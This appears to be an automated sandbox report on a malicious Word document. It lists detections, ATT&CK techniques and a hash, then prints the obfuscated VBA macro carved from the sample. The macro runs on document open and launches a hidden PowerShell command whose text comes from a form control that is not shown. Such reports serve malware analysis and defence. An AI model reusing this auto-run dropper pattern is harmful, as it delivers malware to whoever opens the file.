Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample contains a VBA macro that triggers on document open and uses the Shell() function. The macro appears to be designed to execute a PowerShell command, as indicated by the concatenation of strings to build the command line at runtime. This behavior is consistent with dropper malware designed to download and execute a second-stage payload.
Heuristics (5)
- ClamAV: Doc.Dropper.Agent-6826668-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6826668-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2137 bytes |

SHA-256: c896f8d9cbbe980d1490ddb921f8c20729067c44c7f88f69715d4b1aefc71c56

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim QKSMQ93wF(2 To 46) As String
QKSMQ93wF(2) = "uDI4tBL"
Dim qDFcapCu(2 To 46) As String
qDFcapCu(2) = "yQpuDW"
Dim wYaAyhb(153) As Byte
Dim ij97FXZ83() As Byte
Dim CZz4nq(12 To 128) As String
CZz4nq(12) = "DkiVmYTA"
Dim YrSbMwgB
YrSbMwgB = A73k8hW
Dim MXtyNeCO As String
MXtyNeCO = Jkdvl
x
End Sub
Public Sub sh(EqaIK As String, gWP7wHIK As Integer)
Dim csn9YCeR3(6 To 192) As String
csn9YCeR3(6) = "jH2OnS4Q"
Dim JOFjTVq(170) As Byte
Dim vWjdc(224) As Byte
Dim fzFmf As Long
fzFmf = (28800 / 960) * (52)
End Sub
Attribute VB_Name = "E2qjMA"
Sub x()
Dim NuN0Mt6q8(8 To 174) As String
NuN0Mt6q8(8) = "zdzV2yOL"
Dim BXUWxn As Long
BXUWxn = (27380 / 5476) * (5)
Dim nVHaq8() As Byte
Dim PYHbl(10 To 207) As String
PYHbl(10) = "o3dcNbwxV"
Dim E1k5mhYd(10 To 207) As Long
E1k5mhYd(10) = 4700 / 188
Call VBA.Shell("pow" & _
xKhMSRdsV, 0)
Dim I9uxK() As Byte
Dim tWtyPx As String
tWtyPx = ih3bVoSBn
End Sub
Attribute VB_Name = "TtayOv0R"
Public Function E18Wcl(Ujnfl As Integer)
Dim ei6Co(106) As Byte
Dim Ob3fOPN As String
Ob3fOPN = cZwah6j
Dim hXYUNiC8h As Long
hXYUNiC8h = (3106 / 1553) * (63)
Dim UnMmjfo As String
UnMmjfo = ZfnqYmM3d
End Function
Attribute VB_Name = "IvdhNu"
Public Function xKhMSRdsV()
Dim eLDgA As Long
eLDgA = (13720 / 490) * (23)
Dim HoD4HuPM As Object
Set HoD4HuPM = New f
Dim YkN6mL7 As String
YkN6mL7 = HoD4HuPM.de.Text
Dim ZTBYgbG As Long
ZTBYgbG = (711 - 688) * (9)
xKhMSRdsV = YkN6mL7
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{C2C76892-B20C-4DAA-913E-91C93963CCD3}{1E3484C0-0827-40C1-BEF7-EB9845AFDBD9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False